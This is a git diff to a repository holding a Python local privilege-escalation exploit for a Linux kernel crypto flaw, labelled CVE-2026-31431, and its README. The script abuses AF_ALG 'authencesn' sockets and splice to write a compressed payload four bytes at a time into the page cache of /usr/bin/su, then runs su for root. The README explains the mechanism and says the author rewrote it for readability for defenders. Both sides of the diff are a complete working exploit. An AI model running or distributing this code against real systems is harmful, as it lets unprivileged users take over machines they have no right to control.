diff --git a/CVE-2026-31431/CVE-2026-31431.py b/CVE-2026-31431/CVE-2026-31431.py
index 0014ac1..ac5b51d 100644
--- a/CVE-2026-31431/CVE-2026-31431.py
+++ b/CVE-2026-31431/CVE-2026-31431.py
@@ -1,17 +1,17 @@
 import os, zlib, socket
  
  
-def exploit(zlib_payload, su_file, counter):
+def exploit(payload, su_file, counter):
  
-    listener = socket.socket(38, 5, 0)
+    listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
     listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
  
-    listener.setsockopt(279, 1, bytes.fromhex('0800010000000010'+'0'*64))
-    listener.setsockopt(279, 5, None, 4)
+    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
+    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
  
     connection, _ = listener.accept()
  
-    connection.sendmsg([b"A"*4+zlib_payload], [(279, 3, b'\x00'*4), (279, 2, b'\x10'+b'\x00'*19), (279, 4, b'\x08' + b'\x00' * 3),], 32768)
+    connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
  
     stdin, stdout = os.pipe()
  
@@ -25,14 +25,14 @@ def exploit(zlib_payload, su_file, counter):
  
 if __name__ == "__main__":
  
-    zlib_payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+    payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
  
     su_file = os.open("/usr/bin/su", 0)
  
     i = 0
  
-    while i < len(zlib_payload):
-        exploit(zlib_payload[i:i+4], su_file, i)
+    while i < len(payload):
+        exploit(payload[i:i+4], su_file, i)
         i += 4
  
     os.system("su")
diff --git a/CVE-2026-31431/README.md b/CVE-2026-31431/README.md
index 15319e0..f588483 100644
--- a/CVE-2026-31431/README.md
+++ b/CVE-2026-31431/README.md
@@ -6,7 +6,9 @@ This exploit has caused quite the panic among defenders, so I re-wrote/unminifie
 
 In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms.
 
-*Note* - this version needs at least Python 3.10
+*Note* - This exploit needs at least Python 3.10
+
+*Additional Note* - For sake of readibility, I've replaced the direct int descriptors with their named socket.* versions, this may slightly reduce portability.
 
 # License